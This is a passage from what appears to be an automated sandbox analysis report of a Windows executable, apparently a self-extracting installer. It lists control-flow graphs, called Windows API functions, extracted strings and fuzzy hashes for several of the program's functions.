                                                                                                      • Opcode ID: ed06dced503cc56cd07d3fb45e4e877ea9f02e6e0a1f8c2caf8e00738960b075
                                                                                                      • Instruction ID: f0e03138bd33005e26abf6be61ff4b9bbe234f4cd71355df07ad509626264c42
                                                                                                      • Opcode Fuzzy Hash: ed06dced503cc56cd07d3fb45e4e877ea9f02e6e0a1f8c2caf8e00738960b075
                                                                                                      • Instruction Fuzzy Hash: D2D172B10083989FE730DF68E849FAFBBE8AF84344F50093DF68996152D7B09549CB56

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 404 a0aa45-a0aa5d call a0cdf0 call a0cec0 409 a0aa63-a0aa8d call a096ec 404->409 410 a0b645-a0b652 404->410 409->410 413 a0aa93-a0aa98 409->413 414 a0aa99-a0aaa7 413->414 415 a0aaa8-a0aab8 call a093ba 414->415 418 a0aaba 415->418 419 a0aabc-a0aad1 call a00b12 418->419 422 a0aad3-a0aad7 419->422 423 a0aade-a0aae1 419->423 422->419 424 a0aad9 422->424 425 a0b611-a0b63c call a096ec 423->425 426 a0aae7 423->426 424->425 425->414 439 a0b642-a0b644 425->439 427 a0ad9b-a0ad9d 426->427 428 a0acdd-a0acdf 426->428 429 a0aaee-a0aaf1 426->429 430 a0ad7e-a0ad80 426->430 427->425 434 a0ada3-a0adaa 427->434 428->425 436 a0ace5-a0acf1 428->436 429->425 433 a0aaf7-a0ab64 call a08b8e call 9fb56e call 9fa11c call 9fa256 call 9f6fa3 call 9fa1a9 429->433 430->425 432 a0ad86-a0ad96 SetWindowTextW 430->432 432->425 503 a0acc9-a0acd8 call 9fa132 433->503 504 a0ab6a-a0ab70 433->504 434->425 438 a0adb0-a0adc9 434->438 440 a0acf3-a0ad04 call a14654 436->440 441 a0ad05-a0ad0a 436->441 445 a0add1-a0addf call a120b3 438->445 446 a0adcb 438->446 439->410 440->441 442 a0ad14-a0ad1f call a09844 441->442 443 a0ad0c-a0ad12 441->443 448 a0ad24-a0ad26 442->448 443->448 445->425 461 a0ade5-a0adee 445->461 446->445 454 a0ad31-a0ad51 call a120b3 call a120de 448->454 455 a0ad28-a0ad2f call a120b3 448->455 481 a0ad53-a0ad5a 454->481 482 a0ad6a-a0ad6c 454->482 455->454 462 a0adf0-a0adf4 461->462 463 a0ae17-a0ae1a 461->463 462->463 467 a0adf6-a0adfe 462->467 468 a0ae20-a0ae23 463->468 469 a0aeff-a0af0d call 9ff10e 463->469 467->425 474 a0ae04-a0ae12 call 9ff10e 467->474 475 a0ae30-a0ae4b 468->475 476 a0ae25-a0ae2a 468->476 484 a0af0f-a0af23 call a1031b 469->484 474->484 494 a0ae95-a0ae9c 475->494 495 a0ae4d-a0ae87 475->495 476->469 476->475 488 a0ad61-a0ad69 call a14654 481->488 489 a0ad5c-a0ad5e 481->489 482->425 485 a0ad72-a0ad79 call a120ce 482->485 505 a0af30-a0af83 call 9ff10e call a09592 GetDlgItem SetWindowTextW SendMessageW call a120e9 484->505 506 a0af25-a0af29 484->506 485->425 488->482 489->488 497 a0aeca-a0aeed call a120b3 * 2 494->497 498 a0ae9e-a0aeb6 call a120b3 494->498 522 a0ae89 495->522 523 a0ae8b-a0ae8d 495->523 497->484 534 a0aeef-a0aefd call 9ff0e6 497->534 498->497 515 a0aeb8-a0aec5 call 9ff0e6 498->515 503->425 510 a0ab77-a0ab8c SetFileAttributesW 504->510 543 a0af88-a0af8c 505->543 506->505 511 a0af2b-a0af2d 506->511 516 a0ac32-a0ac3e GetFileAttributesW 510->516 517 a0ab92-a0abc5 call 9fb100 call 9fadf5 call a120b3 510->517 511->505 515->497 527 a0ac40-a0ac4f DeleteFileW 516->527 528 a0acae-a0acc3 call 9fa1a9 516->528 552 a0abc7-a0abd6 call a120b3 517->552 553 a0abd8-a0abe6 call 9fb52e 517->553 522->523 523->494 527->528 533 a0ac51-a0ac54 527->533 528->503 541 a0ab72 528->541 538 a0ac58-a0ac84 call 9f3f5b GetFileAttributesW 533->538 534->484 548 a0ac56-a0ac57 538->548 549 a0ac86-a0ac9c MoveFileW 538->549 541->510 543->425 547 a0af92-a0afa4 SendMessageW 543->547 547->425 548->538 549->528 551 a0ac9e-a0aca8 MoveFileExW 549->551 551->528 552->553 558 a0abec-a0ac2b call a120b3 call a0dea0 552->558 553->503 553->558 558->516
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00A0AA4A
                                                                                                        • Part of subcall function 00A096EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A097B4
                                                                                                      • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00A0A35D,?,00000000), ref: 00A0AB7F
                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A0AC39
                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00A0AC47
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00A0AD90
                                                                                                      • _wcsrchr.LIBVCRUNTIME ref: 00A0AF1A
                                                                                                      • GetDlgItem.USER32(?,00000066), ref: 00A0AF55
                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00A0AF65
                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,00A3412A), ref: 00A0AF79
                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A0AFA2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                      • API String ID: 3676479488-312220925
                                                                                                      • Opcode ID: 20a5a8be3c8b9a20a45b1d96746dec8bd3ec5f0465434fb0248072d96c3be5e0
                                                                                                      • Instruction ID: ac1199a31b552a7f76e3c63f4d95fb5db54d1835f6b7de2a70975b55598978c3
                                                                                                      • Opcode Fuzzy Hash: 20a5a8be3c8b9a20a45b1d96746dec8bd3ec5f0465434fb0248072d96c3be5e0
                                                                                                      • Instruction Fuzzy Hash: 2AE1617690021DAAEF20EBA4EE45EEE737CAF15350F1045A6F905E3091EB709F85CB61

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 563 9fced7-9fcf51 call 9fc88e GetWindowRect GetClientRect 566 9fcf57-9fcf5f 563->566 567 9fcff2-9fcffa 563->567 568 9fcf65-9fcfae 566->568 569 9fd034-9fd04f GetSystemMetrics GetWindow 566->569 567->569 570 9fcffc-9fd02e GetWindowTextW call 9fc91f SetWindowTextW 567->570 572 9fcfb2-9fcfb4 568->572 573 9fcfb0 568->573 571 9fd12d-9fd12f 569->571 570->569 577 9fd135-9fd13f 571->577 578 9fd054-9fd05a 571->578 575 9fcfb8-9fcfee GetWindowLongW GetWindowRect 572->575 576 9fcfb6 572->576 573->572 575->567 576->575 578->577 580 9fd060-9fd078 GetWindowTextW 578->580 581 9fd09f-9fd0a4 580->581 582 9fd07a-9fd099 call 9fc91f SetWindowTextW 580->582 585 9fd11b-9fd12a GetWindow 581->585 586 9fd0a6-9fd114 GetWindowRect 581->586 582->581 585->577 588 9fd12c 585->588 586->585 588->571
                                                                                                      APIs
                                                                                                        • Part of subcall function 009FC88E: _wcschr.LIBVCRUNTIME ref: 009FC8BD
                                                                                                      • GetWindowRect.USER32(?,?), ref: 009FCF0E
                                                                                                      • GetClientRect.USER32(?,?), ref: 009FCF1A
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 009FCFBB
                                                                                                      • GetWindowRect.USER32(?,?), ref: 009FCFE8
                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 009FD007
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 009FD02E
                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 009FD036
                                                                                                      • GetWindow.USER32(?,00000005), ref: 009FD041
                                                                                                      • GetWindowTextW.USER32(00000000,?,00000400), ref: 009FD06C
                                                                                                      • SetWindowTextW.USER32(00000000,00000000), ref: 009FD099
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 009FD0AC
                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 009FD11E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                                      • String ID: d
                                                                                                      • API String ID: 4134264131-2564639436
                                                                                                      • Opcode ID: 5050db9cbefdeb4792da99dcb20f20076819a8817c5a4be066679beb761f3998
                                                                                                      • Instruction ID: b71829057a1aa59738fec2b72f6e3fb269753ad8254c83c54c5486cac06ae415
                                                                                                      • Opcode Fuzzy Hash: 5050db9cbefdeb4792da99dcb20f20076819a8817c5a4be066679beb761f3998
                                                                                                      • Instruction Fuzzy Hash: 21616EB1208305AFD315DFA8CD89E7BBBEAEBC9714F04452DF68592290C674ED06CB52

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(00000068,00A48958), ref: 00A0B71D
                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00A09325), ref: 00A0B748
                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A0B757
                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A202E4), ref: 00A0B761
                                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A0B777
                                                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A0B78D
                                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A0B7CD
                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A0B7D7
                                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A0B7E6
                                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A0B809
                                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A21368), ref: 00A0B814
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$ItemShowWindow
                                                                                                      • String ID: \
                                                                                                      • API String ID: 1207805008-2967466578
                                                                                                      • Opcode ID: 417485cf6c6f966a5a5e037c95cbc1935d1aef39027e274c8418506bac65f57c
                                                                                                      • Instruction ID: 4c0da7a2ec77162ed002a1379e81debc76b2b6ef47effe6f842cb275b897dac5
                                                                                                      • Opcode Fuzzy Hash: 417485cf6c6f966a5a5e037c95cbc1935d1aef39027e274c8418506bac65f57c
                                                                                                      • Instruction Fuzzy Hash: 3B2146712857447BE310EB249C41FAF7F9CEF82714F000A29FA90A61D0C7A55D0A8BB7

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 621 a0b9aa-a0b9c2 call a0cec0 624 a0b9c8-a0b9d4 call a120b3 621->624 625 a0bc0e-a0bc16 621->625 624->625 628 a0b9da-a0ba02 call a0dea0 624->628 631 a0ba04 628->631 632 a0ba0c-a0ba19 628->632 631->632 633 a0ba1b 632->633 634 a0ba1d-a0ba26 632->634 633->634 635 a0ba28-a0ba2a 634->635 636 a0ba5e 634->636 638 a0ba32-a0ba35 635->638 637 a0ba62-a0ba64 636->637 639 a0ba66-a0ba69 637->639 640 a0ba6b-a0ba6d 637->640 641 a0bbc2-a0bbc7 638->641 642 a0ba3b-a0ba43 638->642 639->640 643 a0ba80-a0ba92 call 9fb09c 639->643 640->643 644 a0ba6f-a0ba76 640->644 647 a0bbc9 641->647 648 a0bbbc-a0bbc0 641->648 645 a0ba49-a0ba4f 642->645 646 a0bbdb-a0bbe3 642->646 656 a0ba94-a0baa1 call a00b12 643->656 657 a0baab-a0bab6 call 9f9dff 643->657 644->643 649 a0ba78 644->649 645->646 653 a0ba55-a0ba5c 645->653 650 a0bbe5-a0bbe7 646->650 651 a0bbeb-a0bbf3 646->651 654 a0bbce-a0bbd2 647->654 648->641 648->654 649->643 650->651 651->637 653->636 653->638 654->646 656->657 662 a0baa3 656->662 663 a0bad3-a0bae0 ShellExecuteExW 657->663 664 a0bab8-a0bacf call 9fae20 657->664 662->657 666 a0bae6-a0baf9 663->666 667 a0bc0c-a0bc0d 663->667 664->663 669 a0bafb-a0bb02 666->669 670 a0bb0c-a0bb0e 666->670 667->625 669->670 671 a0bb04-a0bb0a 669->671 672 a0bb10-a0bb19 670->672 673 a0bb21-a0bb40 call a0be69 670->673 671->670 674 a0bb77-a0bb83 CloseHandle 671->674 672->673 682 a0bb1b-a0bb1f ShowWindow 672->682 673->674 688 a0bb42-a0bb4a 673->688 675 a0bb94-a0bba2 674->675 676 a0bb85-a0bb92 call a00b12 674->676 680 a0bba4-a0bba6 675->680 681 a0bbff-a0bc01 675->681 676->675 689 a0bbf8 676->689 680->681 686 a0bba8-a0bbae 680->686 681->667 685 a0bc03-a0bc05 681->685 682->673 685->667 690 a0bc07-a0bc0a ShowWindow 685->690 686->681 691 a0bbb0-a0bbba 686->691 688->674 692 a0bb4c-a0bb5d GetExitCodeProcess 688->692 689->681 690->667 691->681 692->674 693 a0bb5f-a0bb69 692->693 694 a0bb70 693->694 695 a0bb6b 693->695 694->674 695->694
                                                                                                      APIs
                                                                                                      • ShellExecuteExW.SHELL32(000001C0), ref: 00A0BAD8
                                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00A0BB1D
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00A0BB55
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0BB7B
                                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00A0BC0A
                                                                                                        • Part of subcall function 00A00B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009FAC49,?,?,?,009FABF8,?,-00000002,?,00000000,?), ref: 00A00B28
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                                      • String ID: $.exe$.inf
                                                                                                      • API String ID: 3686203788-2452507128
                                                                                                      • Opcode ID: a56a9c01efa6260f6b9d1fe1a3eee14fcfe36707f2cd8c06bbda5c3ee0e31382
                                                                                                      • Instruction ID: f534240a0738a7466469a21e7724f7041cf19132190e05992bcd4f611521b171
                                                                                                      • Opcode Fuzzy Hash: a56a9c01efa6260f6b9d1fe1a3eee14fcfe36707f2cd8c06bbda5c3ee0e31382
                                                                                                      • Instruction Fuzzy Hash: 4D51CF705293889BDB31DF64EA40ABBB7E4AF86744F04081DE4C1931D5EBB58945CB72

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 696 9fcacc-9fcb00 call a0cdf0 call a0cec0 call a10138 703 9fcb33-9fcb3c call 9ff10e 696->703 704 9fcb02-9fcb31 GetModuleFileNameW call 9fb88c call 9ff0e6 696->704 708 9fcb41-9fcb65 call 9f9401 call 9f973d 703->708 704->708 715 9fcb6b-9fcb74 708->715 716 9fcdb8-9fcdd3 call 9f9437 708->716 718 9fcb77-9fcb7a 715->718 720 9fcca8-9fccc8 call 9f99e0 call a120d3 718->720 721 9fcb80-9fcb86 call 9f9aeb 718->721 720->716 730 9fccce-9fcce7 call 9f990d 720->730 725 9fcb8b-9fcbb2 call 9f990d 721->725 731 9fcbb8-9fcbc0 725->731 732 9fcc71-9fcc74 725->732 744 9fcce9-9fccee 730->744 745 9fccf0-9fcd02 call a120d3 730->745 734 9fcbeb-9fcbf6 731->734 735 9fcbc2-9fcbca 731->735 736 9fcc77-9fcc99 call 9f99e0 732->736 739 9fcbf8-9fcc04 734->739 740 9fcc21-9fcc29 734->740 735->734 738 9fcbcc-9fcbe6 call a13660 735->738 736->718 755 9fcc9f-9fcca2 736->755 760 9fcbe8 738->760 761 9fcc67-9fcc6f 738->761 739->740 747 9fcc06-9fcc0b 739->747 742 9fcc2b-9fcc33 740->742 743 9fcc55-9fcc59 740->743 742->743 749 9fcc35-9fcc4f call a13660 742->749 743->732 750 9fcc5b-9fcc5e 743->750 751 9fcd27-9fcd2f 744->751 745->716 766 9fcd08-9fcd25 call a006e9 call a120ce 745->766 747->740 754 9fcc0d-9fcc1f call a13589 747->754 749->716 749->743 750->731 756 9fcd34-9fcd41 751->756 757 9fcd31 751->757 754->740 768 9fcc63 754->768 755->716 755->720 763 9fcdad-9fcdb5 756->763 764 9fcd43-9fcd45 756->764 757->756 760->734 761->736 763->716 769 9fcd46-9fcd50 764->769 766->751 768->761 769->763 771 9fcd52-9fcd56 769->771 773 9fcd58-9fcd5f 771->773 774 9fcd90-9fcd93 771->774 778 9fcd86 773->778 779 9fcd61-9fcd64 773->779 776 9fcd9d-9fcd9f 774->776 777 9fcd95-9fcd9b 774->777 781 9fcda0 776->781 777->776 777->781 784 9fcd88-9fcd8e 778->784 782 9fcd66-9fcd69 779->782 783 9fcd82-9fcd84 779->783 785 9fcda4-9fcdab 781->785 786 9fcd7e-9fcd80 782->786 787 9fcd6b-9fcd6e 782->787 783->784 784->785 785->763 785->769 786->784 788 9fcd7a-9fcd7c 787->788 789 9fcd70-9fcd74 787->789 788->784 789->781 790 9fcd76-9fcd78 789->790 790->784
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009FCAD1
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 009FCAEF
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,009FCAB3,?), ref: 009FCB0A
                                                                                                        • Part of subcall function 00A006E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009FB25B,00000000,?,?,?,?), ref: 00A00705
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                                      • String ID: *messages***$*messages***$R$a
                                                                                                      • API String ID: 803915177-2900423073
                                                                                                      • Opcode ID: e5a623c34ec41debe9baaacc86fd37cbd1e07246da7968945249b083e4bf73a7
                                                                                                      • Instruction ID: 3c4676cc9b3d9d0d6e43779d4b8bab26428b4bb5697abb7fc8970179ff712ad8
                                                                                                      • Opcode Fuzzy Hash: e5a623c34ec41debe9baaacc86fd37cbd1e07246da7968945249b083e4bf73a7
                                                                                                      • Instruction Fuzzy Hash: D39114F190020C9ADB20DF68CE45FFE7BA8EF54710F10896AE759A72D2DA749984CB50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 791 a173ae-a173c7 792 a173c9-a173d9 call a1b9bc 791->792 793 a173dd-a173e2 791->793 792->793 803 a173db 792->803 795 a173e4-a173ec 793->795 796 a173ef-a17413 MultiByteToWideChar 793->796 795->796 797 a175a6-a175b9 call a0d783 796->797 798 a17419-a17425 796->798 800 a17427-a17438 798->800 801 a17479 798->801 804 a17457-a17468 call a159fc 800->804 805 a1743a-a17449 call a1f160 800->805 807 a1747b-a1747d 801->807 803->793 811 a1759b 804->811 818 a1746e 804->818 805->811 817 a1744f-a17455 805->817 810 a17483-a17496 MultiByteToWideChar 807->810 807->811 810->811 814 a1749c-a174ae call a17a09 810->814 815 a1759d-a175a4 call a17616 811->815 820 a174b3-a174b7 814->820 815->797 822 a17474-a17477 817->822 818->822 820->811 823 a174bd-a174c4 820->823 822->807 824 a174c6-a174cb 823->824 825 a174fe-a1750a 823->825 824->815 826 a174d1-a174d3 824->826 827 a17556 825->827 828 a1750c-a1751d 825->828 826->811 829 a174d9-a174f3 call a17a09 826->829 830 a17558-a1755a 827->830 831 a17538-a17549 call a159fc 828->831 832 a1751f-a1752e call a1f160 828->832 829->815 844 a174f9 829->844 834 a17594-a1759a call a17616 830->834 835 a1755c-a17575 call a17a09 830->835 831->834 843 a1754b 831->843 832->834 847 a17530-a17536 832->847 834->811 835->834 849 a17577-a1757e 835->849 848 a17551-a17554 843->848 844->811 847->848 848->830 850 a17580-a17581 849->850 851 a175ba-a175c0 849->851 852 a17582-a17592 WideCharToMultiByte 850->852 851->852 852->834 853 a175c2-a175c9 call a17616 852->853 853->815
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A12FC2,00A12FC2,?,?,?,00A175FF,00000001,00000001,F5E85006), ref: 00A17408
                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A175FF,00000001,00000001,F5E85006,?,?,?), ref: 00A1748E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A17588
                                                                                                      • __freea.LIBCMT ref: 00A17595
                                                                                                        • Part of subcall function 00A159FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A123AA,?,0000015D,?,?,?,?,00A12F29,000000FF,00000000,?,?), ref: 00A15A2E
                                                                                                      • __freea.LIBCMT ref: 00A1759E
                                                                                                      • __freea.LIBCMT ref: 00A175C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1414292761-0
                                                                                                      • Opcode ID: 2e2edbcdd2046c0098371d20ff48532a9129b1925901d0fa3ac980d2d98f494d
                                                                                                      • Instruction ID: 27a9651ca9324ef9203c5a50b572bf4adef22fcaa219f1a9ed5a864ec6d19c13
                                                                                                      • Opcode Fuzzy Hash: 2e2edbcdd2046c0098371d20ff48532a9129b1925901d0fa3ac980d2d98f494d
                                                                                                      • Instruction Fuzzy Hash: 8451AD72614216ABEB258F68CC85EFF7BBBEB44760F155629FD04DA140EB34DCC086A0

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 009FF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009FF324
                                                                                                        • Part of subcall function 009FF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FDEC8,Crypt32.dll,?,009FDF4A,?,009FDF2E,?,?,?,?), ref: 009FF346
                                                                                                      • OleInitialize.OLE32(00000000), ref: 00A0904F
                                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A09086
                                                                                                      • SHGetMalloc.SHELL32(00A320E8), ref: 00A09090
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                      • String ID: riched20.dll$3Ro
                                                                                                      • API String ID: 3498096277-3613677438
                                                                                                      • Opcode ID: 511b61c7af58c401760a72bd218896cdc5b27c5d49f92d5c9516ae36419142e5
                                                                                                      • Instruction ID: 0a9d5bf1b74020c3352f3c3fecdc9a110ddc3ab4920f60d8fd65e48e99379ea6
                                                                                                      • Opcode Fuzzy Hash: 511b61c7af58c401760a72bd218896cdc5b27c5d49f92d5c9516ae36419142e5
                                                                                                      • Instruction Fuzzy Hash: 4DF0317180010DABC710EF9AE8499AEFBBCEF94700F004166A414A2200D7B40606CBA1

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 009FFDC9: ResetEvent.KERNEL32(?,?,009FF9F3,008F3C30,?,00A31E74,00000000,00A1F79B,000000FF,000001B8,009FFC8F,?,?,?,?,009FA5A0), ref: 009FFDE9
